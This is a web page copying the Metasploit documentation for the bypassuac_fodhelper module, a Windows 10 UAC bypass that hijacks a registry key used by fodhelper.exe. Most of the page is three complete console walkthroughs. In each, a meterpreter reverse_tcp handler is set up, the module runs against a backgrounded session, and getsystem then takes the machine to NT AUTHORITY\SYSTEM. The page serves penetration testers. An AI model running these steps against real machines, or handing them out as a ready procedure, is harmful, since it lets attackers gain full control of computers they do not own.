Windows 10 Bypassuac fodhelper module

exploit/windows/local/bypassuac_fodhelper module

This module will bypass Windows 10 UAC by hijacking a special key in the Registry under the current user hive, and inserting a custom command that will get invoked when the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC flag turned off. This module modifies a registry key, but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.

Windows 10×86

msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     <MSF_IP>   yes       The listen address
   LPORT     4567             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > run

[*] Started reverse TCP handler on <MSF_IP>:4567 
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to <Win10x86_IP>
[*] Meterpreter session 1 opened (<MSF_IP>:4567 -> <Win10x86_IP>:49423) at 2017-06-01 10:02:18 -0500

meterpreter > sysinfo
Computer        : DESKTOP-GS5CHPG
OS              : Windows 10 (Build 10240).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > getuid
Server username: DESKTOP-GS5CHPG\msfuser
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/bypassuac_fodhelper 
msf exploit(bypassuac_fodhelper) > set session 1
session => 1
msf exploit(bypassuac_fodhelper) > show options

Module options (exploit/windows/local/bypassuac_fodhelper):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   0   Windows x86


msf exploit(bypassuac_fodhelper) > run

[*] Started reverse TCP handler on <MSF_IP>:4444 
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\system32\cmd.exe /c C:\Windows\System32\fodhelper.exe
[*] Sending stage (957487 bytes) to <Win10x86_IP>
[*] Meterpreter session 2 opened (<MSF_IP>:4444 -> <Win10x86_IP>:49424) at 2017-06-01 10:03:28 -0500
[*] Cleaining up registry keys ...

meterpreter > getuid
Server username: DESKTOP-GS5CHPG\msfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-GS5CHPG
OS              : Windows 10 (Build 10240).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > 

 

Windows 10×64 With x86 payload

msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     <MSF_IP>   yes       The listen address
   LPORT     4567             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > run

[*] Started reverse TCP handler on <MSF_IP>:4567 
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to <Win10x64_IP>
[*] Meterpreter session 1 opened (<MSF_IP>:4567 -> <Win10x64_IP>:49422) at 2017-06-01 10:05:04 -0500

meterpreter > sysinfo
Computer        : DESKTOP-AI9785J
OS              : Windows 10 (Build 10240).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: DESKTOP-AI9785J\msfuser
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/bypassuac_fodhelper 
msf exploit(bypassuac_fodhelper) > set session 1
session => 1
msf exploit(bypassuac_fodhelper) > show options

Module options (exploit/windows/local/bypassuac_fodhelper):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   0   Windows x86


msf exploit(bypassuac_fodhelper) > run

[*] Started reverse TCP handler on <MSF_IP>:4444 
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\Sysnative\cmd.exe /c C:\Windows\System32\fodhelper.exe
[*] Sending stage (957487 bytes) to <Win10x64_IP>
[*] Meterpreter session 2 opened (<MSF_IP>:4444 -> <Win10x64_IP>:49423) at 2017-06-01 10:06:02 -0500
[*] Cleaining up registry keys ...

meterpreter > getuid
Server username: DESKTOP-AI9785J\msfuser
meterpreter > sysinfo
Computer        : DESKTOP-AI9785J
OS              : Windows 10 (Build 10240).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

 

Windows 10×64 with x64 payload

msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     <MSF_IP>   yes       The listen address
   LPORT     4567             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > run

[*] Started reverse TCP handler on <MSF_IP>:4567 
[*] Starting the payload handler...
[*] Sending stage (1189423 bytes) to <Win10x64_IP>
[*] Meterpreter session 1 opened (<MSF_IP>:4567 -> <Win10x64_IP>:49424) at 2017-06-01 10:07:48 -0500

meterpreter > sysinfo
Computer        : DESKTOP-AI9785J
OS              : Windows 10 (Build 10240).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuyid
[-] Unknown command: getuyid.
meterpreter > getuid
Server username: DESKTOP-AI9785J\msfuser
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/bypassuac_fodhelper 
msf exploit(bypassuac_fodhelper) > set session 1
session => 1
msf exploit(bypassuac_fodhelper) > run

[*] Started reverse TCP handler on <MSF_IP>:4444 
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\system32\cmd.exe /c C:\Windows\System32\fodhelper.exe
[*] Sending stage (957487 bytes) to <Win10x64_IP>
[*] Meterpreter session 2 opened (<MSF_IP>:4444 -> <Win10x64_IP>:49425) at 2017-06-01 10:08:41 -0500
[*] Cleaining up registry keys ...

meterpreter > sysinfo
Computer        : DESKTOP-AI9785J
OS              : Windows 10 (Build 10240).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: DESKTOP-AI9785J\msfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

 

Source: Github

Share